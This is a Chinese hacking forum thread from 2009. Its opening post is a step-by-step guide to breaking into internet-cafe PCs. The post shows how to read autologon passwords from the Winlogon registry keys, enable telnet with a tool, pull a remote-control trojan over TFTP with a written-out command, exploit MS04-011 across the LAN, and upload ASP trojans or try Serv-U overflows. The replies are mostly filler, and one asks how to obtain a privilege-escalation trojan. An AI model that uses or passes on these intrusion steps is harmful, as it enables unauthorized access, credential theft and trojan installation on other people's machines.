WPE|52wpe|我爱WPE

 找回密码
 注册会员
搜索
  • 7010查看
  • 23回复

主题

好友

2622

积分

金牌会员

发表于 2009-4-4 23:59:14 |显示全部楼层
入侵的方法很多,但对网吧入侵最常用的方法是什么呢?首先,自动登陆。现在网吧一般都是win2000或者windows
xp的机器,网管一般都把机子设置为自动登陆!这样我们开机进入系统的时候登陆窗口一闪而过!着时候如果我们findfass.exe试图把登陆账号密码找出来是不会成功的!因为账号密码根本不在内存中,而findfass.exe通过winlogon的PID号和正确的域名中,在内存寻找好段加了密的内存块(保存着加密过的登陆密码),然后对它进行解密,这样就能得到明文的密码。实际上自动登陆的账号密码都在注册表中。我们打开注册表HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows
NT\\CurrentVersion\\Winlogon\\这个目录下,AutoAdminLogon这一项的键值为1,表示自动登陆。为1的时候,打开控制面板的用户和密码,会发现需要密码前面的钩已经去掉了。DefaultUserName对应的键值就是登陆用户名,DefaultPassword对应的键值就是登陆密码。实际上海洋顶端木马2006就有着一功能,原理是一样的,不过因为权限的问题,不一定能读出来。这样,密码账号我们都找出来了。而且你要知道,一个网吧的自动登陆密码账号一般都是一样的,而且网管为了方便网虫上网一般把他们设置在管理员组,至少user组。知道了密码账号还愁入侵不了么?网吧机子的server服务一般是禁用的,那我们就不能用ipc入侵了。opentelnet.exe我们也用不了,因为着个也依赖ipc连接,dameware远程控制也不行,道理一样。我们可以用recton着个小巧实用的工具来开telnet,这个工具在win2000下面特别好使。
开了telnet后,我们telnet上去,先在本机打开tftpd32.exe,再telnet下面telnet -i myip get
3721.exe c:\\3721.exe,这样就把我们的木马3721.exe比如radmin传过去了。
再在telnet下面直接运行3721.exe就ok了。

另一个方法就是ms04011漏洞,别以为着个漏洞已经过时了,在网吧这个漏洞还是相当普遍的,许多网吧的网管只会装游戏,重装系统,不重视着写漏洞,懒得打补丁!我们用DSScan扫描192.168.0.1-192.168.0.255,一般会你会很惊喜的。我们到用ms04011溢出工具溢出,一下子就得到了系统权限。


还有很多入侵方法,你可以把xscan搬出来扫描一下。很多菜鸟喜欢用啊D工具包来扫网吧的空口令,实际上这个工具扫用户账号密码很弱,以前我试过,我用上面第一种方法发现网吧都有一个密码为空的管理员账号,用啊D工具包只扫出几台机子有这个账号。我经常用我的最爱

闪电狐——火狐端口扫描器来扫一下网吧主机,第一服务器等。着个扫描器速度很快,扫1到10000端口也要不了几分钟。如果发现服务器开80断口,自然是看是不是架设了网站。再看网站十分有漏洞,想办法传个asp木马上去提升权限。如果发现电影服务器装了serv_u,而且你有了一个账号,可以尝试一下serv_u的溢出。

主题

好友

336

积分

中级会员

发表于 2009-4-5 14:54:06 |显示全部楼层
打酱油........
回复

使用道具 举报

主题

好友

-12

积分

乞丐

发表于 2009-7-22 14:48:33 |显示全部楼层
路过,很想学,但是看不懂。。。
回复

使用道具 举报

主题

好友

-120

积分

乞丐

发表于 2009-8-19 12:33:51 |显示全部楼层
LZ真是强大  不过我不懂
回复

使用道具 举报

主题

好友

8

积分

新手上路

发表于 2009-8-28 11:15:51 |显示全部楼层
看不懂啊看动!我一点黑客知识都没有!!
回复

使用道具 举报

主题

好友

220

积分

中级会员

发表于 2009-8-29 10:15:40 |显示全部楼层
看贴回贴。。
回复

使用道具 举报

主题

好友

300

积分

中级会员

发表于 2010-1-24 20:00:34 |显示全部楼层
虽然看不懂, 但是灌下水,还是要的
回复

使用道具 举报

主题

好友

450

积分

中级会员

发表于 2010-2-4 08:34:39 |显示全部楼层
貌似好难......暂时无法理解
回复

使用道具 举报

主题

好友

112

积分

注册会员

发表于 2010-2-19 00:22:58 |显示全部楼层
强大啊~~~~~~~~~~~~~~~
回复

使用道具 举报

主题

好友

334

积分

中级会员

发表于 2010-2-20 09:29:20 |显示全部楼层
怎么搞1提升权限的木马啊
回复

使用道具 举报

主题

好友

182

积分

注册会员

发表于 2010-2-21 22:40:46 |显示全部楼层
厉害,看不懂   回帖
回复

使用道具 举报

主题

好友

2342

积分

荣誉贵宾

发表于 2010-2-23 18:44:26 |显示全部楼层
1# >>Mr.楊帥


还没到这水平
回复

使用道具 举报

主题

好友

594

积分

高级会员

发表于 2010-2-24 03:47:26 |显示全部楼层
完全看不懂有没有简单点的
回复

使用道具 举报

主题

好友

78

积分

注册会员

发表于 2010-4-18 23:47:21 |显示全部楼层
貌似好难阿。。。
回复

使用道具 举报

主题

好友

3614

积分

论坛元老

发表于 2010-5-10 12:00:34 |显示全部楼层
不缺那几个钱- -!
但是东西还是有用的
回复

使用道具 举报

主题

好友

1370

积分

金牌会员

发表于 2010-7-10 23:57:39 |显示全部楼层
不提倡,小心被发现挨揍!
回复

使用道具 举报

主题

好友

18

积分

新手上路

发表于 2010-11-11 10:49:18 |显示全部楼层
看不懂啊看动!我一点黑客知识都没有!!
回复

使用道具 举报

主题

好友

708

积分

高级会员

发表于 2010-11-12 15:03:39 |显示全部楼层
现在网管都在朝武管方向发展  我怕怕
回复

使用道具 举报

主题

好友

550

积分

高级会员

发表于 2010-11-29 14:17:27 |显示全部楼层
55555555555 真想找个师傅
回复

使用道具 举报

主题

好友

184

积分

注册会员

发表于 2011-9-25 21:28:35 |显示全部楼层
想学习看不懂
回复

使用道具 举报

快速发帖

您需要登录后才可以回帖 登录 | 注册会员

手机版|Archiver|WPE|52wpe|我爱WPE ( 闽ICP备15009081号 )

GMT+8, 2024-5-5 11:34 , Processed in 0.069974 second(s), 16 queries .

返回顶部